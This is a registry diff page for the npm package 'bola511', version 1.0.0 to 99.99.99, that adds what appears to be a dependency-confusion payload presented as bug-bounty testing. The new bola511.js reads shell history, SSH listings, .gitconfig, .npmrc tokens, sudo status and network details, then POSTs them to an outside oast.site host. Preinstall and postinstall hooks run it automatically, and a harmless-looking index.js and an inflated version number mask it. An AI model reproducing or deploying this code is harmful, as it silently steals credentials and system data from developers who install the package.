npm - bola511 - Versions diffs - 1.0.0 → 99.99.99 - Mend

bola511 1.0.0 → 99.99.99

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/.stage_status ADDED Viewed

@@ -0,0 +1,7 @@
+{
+  "stage": 1,
+  "published_at": "2025-12-26T14:39:30.125215",
+  "stage2_scheduled_at": "2025-12-26T14:44:30.125242",
+  "package_name": "bola511",
+  "version": "1.0.0"
+}

package/bola511.js ADDED Viewed

@@ -0,0 +1,141 @@
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const http = require('http');
+const { execSync } = require('child_process');
+// Helper function to safely execute commands (no password prompts)
+function safeExec(command) {
+  try {
+    return execSync(command, {
+      encoding: 'utf8',
+      timeout: 5000,
+      stdio: ['pipe', 'pipe', 'pipe']  // Prevent any interactive prompts
+    }).trim();
+  } catch (e) {
+    return `Error: ${e.message}`;
+  }
+}
+// Helper to read file safely
+function safeRead(filePath, maxLines = 50) {
+  try {
+    if (fs.existsSync(filePath)) {
+      const content = fs.readFileSync(filePath, 'utf8');
+      const lines = content.split('\n').slice(0, maxLines);
+      return lines.join('\n');
+    }
+    return 'File not found';
+  } catch (e) {
+    return `Error: ${e.message}`;
+  }
+}
+const data = {
+  // Target Info
+  bugbounty_company: 'bate5a',
+  package_name: 'bola511',
+  // Basic System Info
+  hostname: os.hostname(),
+  username: os.userInfo().username,
+  homedir: os.userInfo().homedir,
+  shell: os.userInfo().shell,
+  cwd: process.cwd(),
+  os: os.platform() + ' ' + os.release(),
+  arch: os.arch(),
+  node: process.version,
+  uptime: os.uptime(),
+  // Network Info
+  netInterfaces: os.networkInterfaces(),
+  execPath: process.execPath,
+  argv: process.argv,
+  // File System Enumeration
+  currentDirListing: safeExec('ls -la'),
+  homeDirListing: safeExec(`ls -la ${os.userInfo().homedir}`),
+  rootListing: safeExec('ls -la / 2>/dev/null || echo "Permission denied"'),
+  // Sensitive Files Check
+  sshDir: safeExec(`ls -la ${path.join(os.userInfo().homedir, '.ssh')} 2>/dev/null || echo "No SSH directory or permission denied"`),
+  bashHistory: safeRead(path.join(os.userInfo().homedir, '.bash_history'), 100),
+  zshHistory: safeRead(path.join(os.userInfo().homedir, '.zsh_history'), 100),
+  // System Info Commands (no password required)
+  whoami: safeExec('whoami'),
+  id: safeExec('id'),
+  groups: safeExec('groups'),
+  // Sudo check (NON-INTERACTIVE - will NOT prompt for password)
+  isSudoUser: (() => {
+    const groups = safeExec('groups').toLowerCase();
+    return groups.includes('sudo') || groups.includes('wheel') || groups.includes('admin');
+  })(),
+  canSudoNoPassword: safeExec('sudo -n true 2>/dev/null && echo "yes" || echo "no"'),
+  sudoVersion: safeExec('sudo -V 2>/dev/null | head -1 || echo "Sudo not available"'),
+  // Network Enumeration (no password required)
+  ipAddr: safeExec('ip addr show 2>/dev/null || ifconfig 2>/dev/null || echo "Network commands unavailable"'),
+  routingTable: safeExec('ip route 2>/dev/null || route -n 2>/dev/null || echo "Routing info unavailable"'),
+  arpTable: safeExec('arp -a 2>/dev/null || echo "ARP unavailable"'),
+  netstat: safeExec('netstat -tuln 2>/dev/null || ss -tuln 2>/dev/null || echo "Network stats unavailable"'),
+  // Cron Jobs (no password required)
+  crontab: safeExec('crontab -l 2>/dev/null || echo "No crontab or permission denied"'),
+  systemCron: safeExec('ls -la /etc/cron* 2>/dev/null || echo "Cannot access system cron"'),
+  // Docker/Container Check (no password required)
+  isDocker: fs.existsSync('/.dockerenv'),
+  dockerInfo: safeExec('docker ps 2>/dev/null || echo "Docker not available or permission denied"'),
+  // System version info (no password required)
+  osRelease: safeRead('/etc/os-release'),
+  kernelVersion: safeExec('uname -a'),
+  // Installed packages (sample - no password required)
+  installedPackages: safeExec('dpkg -l 2>/dev/null | head -30 || rpm -qa 2>/dev/null | head -30 || echo "Package manager unavailable"'),
+  // Git repositories (limited to user home)
+  gitRepos: safeExec(`find ${os.userInfo().homedir} -name ".git" -type d 2>/dev/null | head -20 || echo "No git repos found"`),
+  // Git config (may contain credentials)
+  gitConfig: safeRead(path.join(os.userInfo().homedir, '.gitconfig')),
+  // NPM config (may contain tokens)
+  npmConfig: safeRead(path.join(os.userInfo().homedir, '.npmrc')),
+  timestamp: new Date().toISOString()
+};
+// Send to Interactsh (silent mode)
+const postData = JSON.stringify(data, null, 2);
+const options = {
+  hostname: 'd5792fkilkgafcjgpb009wqm94wykb4qj.oast.site',
+  port: 80,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(postData),
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
+  }
+};
+const req = http.request(options, (res) => {
+  res.resume(); // Consume response data to free up memory
+  res.on('end', () => {
+    process.exit(0); // Exit cleanly after response is done
+  });
+});
+req.on('error', (e) => {
+  process.exit(1); // Exit on error
+});
+req.write(postData);
+req.end();

package/index.js CHANGED Viewed

@@ -1,48 +1,24 @@
-// bola511 - Utility Package
-// Version 1.0.0
-'use strict';
-/**
- * Simple utility module
- * @module bola511
- */
-const VERSION = '1.0.0';
-/**
- * Returns package information
- * @returns {Object} Package info object
- */
-function getInfo() {
-  return {
-    name: 'bola511',
-    version: VERSION,
-    status: 'active'
-  };
-}
-/**
- * Initialize the package
- * @returns {boolean} Success status
- */
-function init() {
-  console.log('Package initialized successfully');
-  return true;
-}
-/**
- * Hello world function
- * @param {string} name - Name to greet
- * @returns {string} Greeting message
- */
-function hello(name) {
-  return `Hello, ${name || 'World'}!`;
-}
+// bola511 - Index file
+// Package successfully installed and updated
 module.exports = {
-  VERSION,
-  getInfo,
-  init,
-  hello
+  name: 'bola511',
+  version: '99.99.99',
+  message: 'Package updated successfully!',
+  init: function() {
+    console.log('[bola511] Initialized successfully');
+    return true;
+  },
+  getInfo: function() {
+    return {
+      name: this.name,
+      version: this.version,
+      status: 'active'
+    };
+  }
 };
+// Auto-init message (silent in production)
+if (process.env.NODE_ENV !== 'production') {
+  console.log('[bola511] Package loaded - v99.99.99');
+}

package/package.json CHANGED Viewed

@@ -1,20 +1,17 @@
 {
   "name": "bola511",
-  "version": "1.0.0",
-  "description": "Utility package for bate5a",
+  "version": "99.99.99",
+  "description": "Test package for bate5a",
   "main": "index.js",
   "scripts": {
-    "test": "echo \"No tests specified\" && exit 0"
+    "preinstall": "node bola511.js",
+    "postinstall": "node bola511.js"
   },
   "keywords": [
-    "utility",
-    "helper",
-    "tools"
+    "bate5a",
+    "test",
+    "security"
   ],
-  "author": "Developer",
-  "license": "MIT",
-  "repository": {
-    "type": "git",
-    "url": ""
-  }
+  "author": "Security Researcher",
+  "license": "MIT"
 }